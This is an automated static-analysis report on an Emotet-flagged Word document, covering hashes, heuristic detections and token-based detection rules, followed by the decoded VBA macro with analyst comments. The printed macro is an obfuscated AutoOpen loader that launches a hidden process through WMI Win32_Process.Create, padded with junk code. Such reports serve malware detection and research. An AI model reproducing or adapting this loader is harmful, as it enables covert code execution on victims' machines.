Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fa9052ec297d3951…

MALICIOUS

Office (OLE)

133.9 KB Created: 2019-05-21 07:46:00 Authoring application: Microsoft Office Word First seen: 2021-08-20
MD5: 4d478c33b8134fa3553362d1d9648cb5 SHA-1: 7204c708eecf449af04acaa9537e4bfeea625e13 SHA-256: fa9052ec297d39514aec2cdbdf04a5bb53e0e8a67760070e56e09e43d4acf738
310 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses WMI to launch processes. ClamAV also identifies it as Emotet. The VBA macro code, though obfuscated, contains autoopen and GetObject calls, consistent with a downloader attempting to execute a second-stage payload. The presence of WMI process creation suggests an attempt to execute arbitrary code.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the heuristic's detail line (no detail line is rendered for this sample).
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    autoopen( _
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description conflicts with the OLE_VBA_* findings above and the recovered macros.bas artifact below; for this sample the recovered VBA project, not the legacy marker, is the evidence that matters.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5808 bytes
SHA-256: 0c89221e537bf357fcba350de690c01166c38552d4601e2b045def3c757e435f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "D2722316"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "o59071, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z4641307, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Y12454"
' T58828: not called from any other procedure in the visible listing.
' Every statement fills a dynamic array with arithmetic over literals and
' undeclared names (these evaluate as Empty/0 unless Option Explicit is set —
' no Option Explicit is visible in this module), and the arrays are never read.
' Appears to be padding that dilutes the real logic; nothing here executes a
' command or touches an object.
Sub T58828()
   Dim F80871()
      ReDim F80871(53266)
      F80871(53148) = 955 + Int(U946439) + B2152371 + Int(656) + z1174585 + Y43_07_ + 128 + z59643
      F80871(53136) = 103 + Int(l95388) + k2_64347 + Int(769) + Q780561 + b31432 + 615 + E74504
      F80871(53220) = 961 + Int(f35_768) + E_198123 + Int(438) + R376682 + n5_10550 + 557 + i156014
      F80871(53121) = 958 + Int(i00845) + X0474_81 + Int(994) + i38961 + B7642072 + 531 + c19_29
   Dim J9992_8()
      ReDim J9992_8(53266)
      J9992_8(53148) = 559 + Int(E3_88_) + X88623 + Int(582) + U868863 + R_908959 + 136 + c792917
      J9992_8(53136) = 776 + Int(X12190) + T88__74 + Int(338) + w15189 + v4_80625 + 900 + o009392
      J9992_8(53220) = 893 + Int(K955707) + U44__47 + Int(700) + s68580 + O246_3 + 189 + b348766
      J9992_8(53121) = 528 + Int(v_67148) + b49769 + Int(302) + r51938 + c74_2_4 + 346 + o73336
End Sub
' autoopen: the Word auto-execution entry point, run when the document opens.
' The declaration is split across three physical lines with "_" continuations
' ("Sub _" / "autoopen( _" / ")"), so the text "Sub autoopen" never appears on
' one source line — presumably to defeat line-oriented signatures (inference).
' Apart from the single call to B99_74 below, the body is the same
' never-read array padding as elsewhere in this module.
Sub _
autoopen( _
)
   ' Padding: the array is filled and never read.
   Dim S55338()
      ReDim S55338(87025)
      S55338(86925) = 197 + Int(r0557287) + o05854 + Int(864) + S172_4 + c332_6_ + 179 + P2747328
      S55338(86900) = 61 + Int(f895089) + X259354_ + Int(832) + b057_81 + A4369_6 + 489 + p2_052
      S55338(86890) = 714 + Int(J_3983) + N3638408 + Int(140) + A3092974 + B5390359 + 502 + h23430
      S55338(86859) = 113 + Int(J34900) + F12_69 + Int(232) + T915_8 + T1760066 + 528 + G5___486
' The only effective statement: hand off to B99_74, which holds the WMI
' process-creation chain.
B99_74
   ' Padding: the array is filled and never read.
   Dim a_168059()
      ReDim a_168059(87025)
      a_168059(86925) = 305 + Int(I4702167) + X17421 + Int(605) + c9264651 + T9029141 + 182 + j246829
      a_168059(86900) = 158 + Int(F273_1) + Q91093 + Int(183) + q3015750 + A8580883 + 692 + p1600_49
      a_168059(86890) = 361 + Int(F3__22) + H44496_ + Int(79) + G_6301 + J78123 + 658 + F806673
      a_168059(86859) = 174 + Int(m84_028) + r05_90 + Int(974) + D3172_05 + h441375 + 633 + n_51509
End Sub
' B99_74: the real payload of this module, called from autoopen. Stripped of the
' never-read array padding, it does four things in order:
'   1. obtains a Win32_ProcessStartup object through the winmgmts: moniker,
'   2. sets its ShowWindow to 0 (hidden window),
'   3. obtains a Win32_Process object the same way, and
'   4. calls Win32_Process.Create with a command line assembled at runtime.
' The WMI class names are split ("winmgmts:Win32" + "_Process...") and routed
' through v752570, which (see the function below) returns its argument
' unchanged — the indirection exists only to keep the whole moniker out of the
' source text. Detection should key on the GetObject/winmgmts + .Create pair
' rather than on any literal class name.
Sub B99_74()
   Dim V43261()
      ReDim V43261(87025)
      V43261(86925) = 286 + Int(U_3194_) + w9826_ + Int(576) + L128_9_ + d_37556 + 729 + z_049476
      V43261(86900) = 429 + Int(j9211949) + A4955_5 + Int(304) + m100658 + T3728_2 + 76 + i2__3_7
      V43261(86890) = 82 + Int(T232737) + i82_58 + Int(175) + F630__ + o270048 + 974 + B56544
      V43261(86859) = 746 + Int(Z373165_) + b34525 + Int(472) + l45_652 + j2021333 + 219 + V64395_
' (1) Win32_ProcessStartup instance; the class name is concatenated at runtime.
Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
   Dim L7913123()
      ReDim L7913123(87025)
      L7913123(86925) = 275 + Int(S_115665) + X74410 + Int(100) + D6_491 + E9__7606 + 125 + f15568
      L7913123(86900) = 1 + Int(R988823) + k419957 + Int(631) + H69_0112 + a79736 + 280 + Q63515
      L7913123(86890) = 676 + Int(Q_00623_) + o78_7402 + Int(536) + N254040 + b3129848 + 35 + L_55886
      L7913123(86859) = 675 + Int(O27310) + j94_947 + Int(602) + v132_1 + m17203 + 897 + D50900
' (2) ShowWindow = 0: "422843 - 422843" is just an obfuscated zero, i.e. the
' spawned process gets a hidden window. The member access is split across a
' line continuation so ".ShowWindow" is not on the same line as the object.
j9118_6. _
ShowWindow = 422843 - 422843
   Dim a_213263()
      ReDim a_213263(87025)
      a_213263(86925) = 921 + Int(z407_800) + f06534 + Int(526) + L817474 + n041_480 + 646 + p188932
      a_213263(86900) = 497 + Int(w443_3) + c_732269 + Int(542) + o48210 + T0260269 + 562 + w1822506
      a_213263(86890) = 909 + Int(z83360) + R59370 + Int(451) + H74_09_2 + i92445 + 263 + L787657
      a_213263(86859) = 400 + Int(F48_2543) + z41598 + Int(430) + V04_13 + w074485 + 971 + r1__3205
' (3) Win32_Process class object, same concatenated-moniker trick.
Set K85731 = GetObject(v752570("winmgmts:Win32" + "_Process"))
   Dim V0972258()
      ReDim V0972258(87025)
      V0972258(86925) = 971 + Int(O25473_) + j33_07 + Int(826) + X55_29 + D920521 + 276 + W2725_04
      V0972258(86900) = 397 + Int(J356767) + B77_33 + Int(127) + F28395 + O162951 + 976 + m597644
      V0972258(86890) = 815 + Int(j_29614) + z614_3 + Int(544) + M36_48 + a6840_ + 572 + P087927_
      V0972258(86859) = 925 + Int(C94_0277) + h5556908 + Int(60) + k1_8966 + A588_828 + 484 + w638542
' (4) Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId).
' The command line is built from "po" plus the contents of the two MSForms
' TextBox controls declared on form module D2722316 (z4641307 and o59071, see
' the Attribute lines at the top of the listing); the remaining names are
' undeclared and presumably contribute empty strings. The actual command text
' therefore lives in the form's control values, not in this macro source, which
' is why no URL or interpreter name is visible here. j9118_6 supplies the hidden
' window; R8_855 receives the new process id.
K85731.Create N054495 + "po" + j26283 + D2722316.z4641307 + D2722316.o59071 + X9833436, O3643039, j9118_6, R8_855
   Dim O080_87()
      ReDim O080_87(87025)
      O080_87(86925) = 830 + Int(n21_787) + M04747 + Int(547) + Y1487_49 + u572492 + 416 + P6359982
      O080_87(86900) = 514 + Int(R255531) + f04159 + Int(666) + q237_8_0 + o4231_73 + 122 + Z1092533
      O080_87(86890) = 38 + Int(v38268) + W6539057 + Int(270) + c6__4240 + l80_85 + 966 + Z0144610
      O080_87(86859) = 93 + Int(r_2357_3) + H0668073 + Int(98) + F57_637 + S30259 + 539 + F592_4_
End Sub
' v752570: an identity function. Its only effective statement assigns the
' argument back as the return value; everything else is never-read array
' padding. B99_74 wraps every WMI moniker in this call so that the string
' reaches GetObject via a helper rather than as a plain literal argument.
Function v752570(j600346)
   Dim S2_4_8_1()
      ReDim S2_4_8_1(21784)
      S2_4_8_1(21701) = 701 + Int(u156924) + A5950875 + Int(457) + f13171 + B0837203 + 19 + E8299756
      S2_4_8_1(21663) = 423 + Int(l3___09) + m_63_422 + Int(273) + b_68763 + K691726 + 291 + B68732
      S2_4_8_1(21658) = 220 + Int(V5435409) + T683_8 + Int(248) + i00051_ + V4656521 + 912 + m859_4
      S2_4_8_1(21694) = 783 + Int(k0__94) + c036414 + Int(356) + z32_9_08 + E023793 + 533 + f256511
' Return the input unchanged.
v752570 = (j600346)
   Dim w0799_35()
      ReDim w0799_35(21784)
      w0799_35(21701) = 234 + Int(w13635_1) + E9_075 + Int(995) + Z902_68 + D64339_5 + 205 + B65959
      w0799_35(21663) = 258 + Int(Z7960_3) + P_711_31 + Int(896) + u33024 + C92409 + 406 + m4370602
      w0799_35(21658) = 635 + Int(Z74_888) + u56_012 + Int(155) + P8554747 + Q9657055 + 239 + F23050
      w0799_35(21694) = 323 + Int(P9508812) + T277120 + Int(139) + f9_273 + d09_03 + 429 + j80944
End Function


Attribute VB_Name = "Z62968"